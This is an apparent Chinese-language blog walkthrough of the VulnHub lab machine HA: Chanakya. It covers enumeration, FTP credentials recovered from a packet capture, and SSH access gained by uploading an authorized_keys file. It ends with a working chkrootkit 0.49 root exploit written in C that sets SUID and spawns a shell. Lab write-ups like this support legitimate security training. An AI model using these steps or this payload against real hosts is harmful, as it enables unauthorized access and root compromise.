VulnHub靶场学习_HA: Chanakya

HA-Chanakya

Vulnhub靶场

下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/

背景:

摧毁王国的策划者又回来了,这次他创造了一个难题,会让你挠头!是时候面对Chanakya。

您能否解决这个“从根本上启动”并证明自己更明智?

枚举是关键!!!!

 

 

 

首页:

 

全端口扫描

 

尝试匿名登录FTP

 

目录扫描

 

http://192.168.136.179/assets/

 

对里面的文件进行查看,是字体库。

 

这里实在没有发现什么,只能换大字典fuzz跑文件了,抓数据包,设置爆破点。

 

第一个点用了top10000,第二个点是常见后缀。

 

设置线程为999,跑了10多分钟,终于有了个文件。(字典取至dirmap)

 

http://192.168.136.179/abuse.txt

 

SSH、FTP的密码都不对,如果不是密码就可能是个文件吧。

http://192.168.136.179/nfubxn.cpncat没有该文件。

如果是加密文件应该就是错位等加密方法吧,试试栅栏密码、凯撒密码等。

 

凯撒密码加密偏移量为13。

http://192.168.136.179/ashoka.pcapng

Wireshark的流量包的格式

 

发现FTP的数据流含有账号密码且显示的是登陆成功。

ashoka:kautilya

 

依次访问没有发现可用的信息。

但显示的内容像是在用户路径下的隐藏文件,该ftp的目录可能就是ashoka用户的目录。

而且ftp运行新建文件夹和上传文件。

所以可以设置SSH免密登录,将文件上传到.ssh的文件夹下。

在kali上设置,刚开始使用了DSA 密钥。

ssh-keygen -t dsa   

cd ~/.ssh/

cp id_dsa.pub authorized_keys

然后将authorized_keys上传到ftp的.ssh路径下。

 

连接ssh。

 

没有成功,中途多次修改了/etc/ssh/sshd_config的配置文件以及权限的修改也没能成功。

查阅资料发现:

 

使用了RSA 密钥试试,

 

这里如果不设置密码就三个回车,将会在.ssh文件夹下生成公钥(id_rsa.pub)和私钥(id_rsa),将公钥(id_rsa.pub)复制为authorized_keys并上传到ftp的.ssh文件夹下。

而且,这里的权限我也没有修改到700,保持的600权限。

 

ssh [email protected]。这里也可以将id_rsa.pub文件下载利用Xshell等软件连接。

 

find / -user root -perm -4000 -print 2>/dev/null       查询suid文件

 

sudo -l       显示出自己(执行 sudo 的使用者)的权限

 

find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null     查询777权限文件

 

下载cha.zip,发现里面是网站的备份数据。

 

也没有什么用,翻来翻去,在/tmp下发现logs。

cat logs

 

百度看看这是什么文件。

 

是入侵检测工具chkrootkit生成的运行结果。

 

而且还是本地提权,就是他了。

find -name chkrootkit*  2>/dev/null       查询chkrootkit文件

 

查看chkrootkit的版本。

./chkrootkit -V

该版本存在漏洞。

 

同时,该漏洞要实现还需要能够运行chkrootkit,使它去调用update文件。

查看crontab -u root -l。没有权限,应该是有运行chkrootkit计划的。

 

在kali中新建一个update.c的文件,并写入下面的数据。

#include <unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

文件内容是利用chkrootkit将update文件属性修改为root:root,并给予任何人执行权限,当ashoka执行该文件时就能获取root的shell。

在kali下编译文件gcc update.c -o update

 

然后将update拷到ashoka的/tmp/下。

拷进去后,利用chkrootkit 0.49漏洞原理:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。从而使文件获取root权限,接下来运行该文件可提权。(所以上图的update才会从ashoka变为root)

 

这里我刚拷update进去不一会就变成root了。

运行./update

 

验证下crontab -l。每分钟运行一次chkrootkit并将结果返回到/tmp/logs。

 

-- Ly_Dargo

猜你喜欢

转载自www.cnblogs.com/Ly-Dargo/p/12813208.html